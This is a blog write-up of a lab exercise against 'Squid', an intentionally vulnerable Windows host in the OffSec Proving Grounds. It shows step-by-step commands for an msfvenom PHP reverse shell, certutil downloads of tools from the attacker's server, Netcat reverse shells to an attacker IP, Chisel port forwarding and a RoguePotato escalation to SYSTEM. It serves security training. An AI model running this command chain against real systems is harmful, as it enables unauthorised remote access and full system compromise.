Offensive-S3c: Squid - OffSec PG (ModerateMode)

<Introduction>

In this blog post, I’ll be walking you through an alternative method to exploit the Squid vulnerable host from the OffSec Proving Grounds. While my previous "Easy Mode" post covered a basic exploitation path, today I’ll explore a more advanced approach to gaining system-level access. If you haven’t already, I recommend reading the Easy Mode blog post first for a comprehensive overview of the initial steps.

<WHATS COVERED>

In this guide, I’ll be using similar initial access techniques as demonstrated in the Squid Easy Mode post, including command injection and remote file inclusion. For privilege escalation, I’ll take a deeper dive into scheduled task abuse using FullPowers and token impersonation via Rogue Potato. The steps involved here are slightly more intricate compared to the Easy Mode, so buckle up for a more challenging yet rewarding exploit.

If you find this content informative and you are interested in cybersecurity, please regularly check back on Cyb3-S3c for more updates. For more free content, please like and subscribe to the Cyb3r-0verwatch channel.

<OVERVIEW>

As discussed in the Easy Mode post, Squid is a virtual machine designed by Enox and is available in the OffSec Proving Grounds virtual training lab. The host is intentionally vulnerable, with issues such as a misconfigured proxy, identification and authentication failures, broken access control, and various security misconfigurations.

<Exploitation: Prepping the Battlespace>

First, I launched the target host Squid. The OffSec PG console displays the assigned IP address. I followed the steps outlined in the Easy Mode post to gain an initial foothold using a web shell. I highly recommend reading through the Squid Easy Mode post to get up to speed.

msfvenom -p php/reverse_php LHOST=192.168.45.244 LPORT=1234 -f raw > g_reverse.php

Having established a foothold through the 'backdoor.php' shell, I need to improve my access. In this video I will generate a generic PHP reverse shell, as shown in the CLI. I will use it to connect to a Netcat listener.

My payload generated successfully. Now that my generic reverse shell payload has been generated, I’ll upload it to the target host. 

<Exploitation: Gaining A Foothold>

python -m http.server 8080

I ran the following command shown in the CLI to start my HTTP server.

nc -lvnp 1234

I also started my Netcat listener on port 1234.

Certutil.exe -urlcache -split -f http://192.168.45.244:8080/g_reverse.php

I executed the following Certutil command through the browser. The output shows that the generic reverse shell payload was uploaded successfully.

To execute my payload I’ll run the following command shown in the address and hit enter.

Looking at my Netcat listener, I can see that a session successfully established with the target host.

 Running the 'whoami' command revealed that I was operating under the 'LocalService' account.

Certutil.exe -urlcache -split -f http://192.168.45.244:8080/nc.exe

I have improved my access to the underlying operating system. The PHP shell tended to disconnect periodically, so I needed a more stable shell. I uploaded Netcat Windows binary to the target host using the 'backdoor.php' shell.

nc -lvnp 4321

Now that Netcat is uploaded to the target host, I ran my second Netcat listener on port 4321 using the following command shown in the CLI.

nc.exe -e cmd.exe 192.168.45.244 4321

With my second Netcat listener running, I ran the following command shown in the CLI to connect to Kali.

When I looked at my second Netcat listener running on port 4321, I can see it has caught a shell and shows the Windows command prompt.

Now that I have a more stable shell on the underlying operating system of the target host, I can start the process of privilege escalation. 

<Post-Exploitation: Escalating My Privileges>

whoami /priv

Since I performed enumeration on the "Easy Mode" post, I will skip running WinPEAS and we can go with the assumption that I have already discovered that the 'LocalService' account does not have the expected privilege set based on the 'whoami /priv' output.

certutil.exe -urlcache -split -f http://192.168.45.214:8080/FullPowers.exe

I uploaded the 'FullPowers.exe' file to the target host using the following Certutil command shown in the address bar. 

fullpowers.exe

With FullPowers uploaded to the target host, I ran the following command shown in the command prompt. Based on the output it appears that it has executed successfully.

whoami /priv

I ran the ‘whoami /priv’ command to verify whether FullPowers worked. It appears that the 'LocalService' account now has a majority of the privileges required to escalate privileges. 

On the PayloadAlltheThings Github repository, the Windows-Privilege Escalation page discusses tools that can be used to exploit those privileges once restored. Since from service enumeration I know that the target host is a Windows Server 2019, I’ll want to use Rogue Potato.

(https://github.com/k4sth4/Rogue-Potato/tree/main)

On the following Rogue Potato Github repository, I downloaded both 'RoguePotato.exe' and 'Chisel.exe'. 

Using the 'backdoor.php' shell, I uploaded the following tools: Rogue Potato and Chisel using the Certutil command. Netcat Windows binary was uploaded earlier in the walkthrough. Based on the output it appears all the tools uploaded successfully.

echo c:\wamp\www\nc.exe 192.168.45.244 4444  -e cmd > rev.bat

With everything in place I changed directory to the web root folder. I will begin the process of exploiting the target host with Rogue Potato.

On the target host I created a batch script using the command shown in the command prompt. The 'rev.bat' script when executed will launch Netcat to connect to Kali on port 4444.

nc -lvnp 4444

I launched my 2nd Netcat listener on port 4444, as shown in the CLI.

chisel server -p 8000 --reverse

On Kali I ran the following Chisel command shown in the CLI to start a listener as a server on port 8000 that will reverse port forward any sessions it receives.

chisel.exe client 192.168.45.244:8000 R:135:127.0.0.1:9999

On the target host using the 'g_reverse.php' shell, I ran the following Chisel command shown in the CLI. The Chisel client connects to Kali on port 8000, the capital 'R' flag tells the target host to forward traffic received on port 135 to the loopback address on port 9999. Port 9999 will be the port Rogue Potato will be listening on.

RoguePotato.exe -r 192.168.45.244 -l 9999 -e c:\wamp\www\rev.bat

I ran the following command shown in the target host command prompt. As can be seen in the output, I was able to get the 'System' token. '-r' is Kali’s IP, '-l' is the listening port, and the '-e' is to executes the 'rev.bat' file.

<Post-Exploitation: I Got Root>

I ran the 'whoami' command as shown in the command prompt and it looks like I got 'System'.

I changed directory to the '\Users\Administrator\Desktop' folder. I ran the 'dir' command as shown in the command prompt to display the contents. The output showed the 'proof.txt' file.

I ran the 'type' command as shown in the command prompt to view the contents of the 'proof.txt' file. As can be seen in the command prompt I now have the 'proof.txt' hash. And with that I have completed the Squid vulnerable host.

 </CONCLUSION>

To conclude this write-up, using a variety of techniques I was able to go from reconnaissance to gaining root privileges on the vulnerable host Squid. My initial recon yielded crucial information. Through a systematic approach, I successfully gained a foothold on the target host. Further host enumeration uncovered a viable path to escalate my privileges, ultimately capturing the root flag.

If you find this content informative and you are interested in cybersecurity, please regularly check back on the Cyb3r-S3c website. For more free content, please like and subscribe to the Cyb3r-0verwatch channel. Until next time keep learning, the only way to improve is to keep learning.

/Signing Off,

Pragmat1c_0n3